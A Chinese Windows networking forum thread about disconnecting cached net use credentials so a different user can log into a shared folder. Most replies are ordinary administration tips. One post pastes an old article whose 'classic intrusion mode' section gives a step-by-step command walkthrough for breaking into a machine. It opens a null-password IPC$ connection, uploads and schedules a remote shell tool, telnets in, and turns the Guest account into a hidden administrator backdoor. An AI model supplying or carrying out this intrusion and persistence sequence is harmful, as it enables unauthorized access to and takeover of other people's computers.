windows 下登录另一台windows的共享目录夹, 如何可以切换到不同的用户?

楼主(2010-02-18):
比如我用A电脑, B电脑有几个共享目录。

同时,B电脑上有几个不同权限的用户。

但当A已经用某一个用户登录到B的共享目录后, 下一次我想再用另一个不同的用户登录, 如果将登录的窗口再弹出来?

现在的解决方法好像只能重启A电脑。

楼主:
找到答案:

net   use   \\对方计算机名称或者IP地址   /delete

如果不想输入IP等,直接:  net usr * /delete ,会一个一个提示你是否删除缓存口令。

网友:
net use \\对方计算机名称或者IP地址  /USER:newuser
不然,对方开了GUEST是不会出现输入密码的选项直接进去了.

网友:
学习了,我以前一直以为这是没法解决,归咎于WINS的机制有问题

楼主:
回复 网友A:
net use \\对方计算机名称或者IP地址  /USER:newuser
不然,对方开了GUEST是不会出现输入密码的选项直接进去了.
晕,仍不行,仍不会提示登录框,直接提示权不对:

楼主:
net use与net user 详解

本贴发布于:2007年06月29日 15:52:09         此贴作者没有留下尊姓大名 IP:(123.52.95.75)

[ + 查看附加描述]        小提示:双击网页自动下移

net user 用户名 密码 /add  建立用户

net user guest /active:yes 激活guest用户

net user guest /active:no 不使用guest用户

net user   查看有哪些用户

net user   帐户名 查看帐户的属性

net localgroup  查看工作组

net localgroup administrators 用户名 /add 把“用户”添加到管理员中(用户名必须存在)

net start  启动服务

net stop   停止服务

八 相关命令

1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

网友:
\\IP 后面没有目录名

楼主:
回复 网友A:
\\IP 后面没有目录名
哈哈,不是这个原因。

找到了。 再测试一下,一会将完整的解决方法上传上来。

楼主:
图解教程来了:

网友:
1、参数顺序不重要,不过一般建议密码作为最后一项参数

2、直接以参数形式提供密码时,最好对密码加上双引号,否则密码不能使用特殊字符和空格

3、直接通过命令行参数方式提供密码时,本机当时正在运行的所有应用程序都有机会查询到这个密码

网友:
工具 -> 断开网络连接 就行了。